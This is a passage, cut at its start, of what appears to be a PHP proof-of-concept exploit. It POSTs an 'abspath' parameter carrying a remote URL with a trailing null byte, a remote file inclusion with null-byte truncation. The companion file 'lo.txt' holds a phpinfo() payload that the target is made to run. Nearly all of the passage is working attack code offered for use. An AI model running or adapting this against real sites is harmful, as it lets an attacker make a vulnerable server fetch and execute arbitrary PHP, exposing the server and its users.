curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('abspath'=>"http://localhost/lo.txt\0"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
lo.txt
<?php phpinfo(); ?>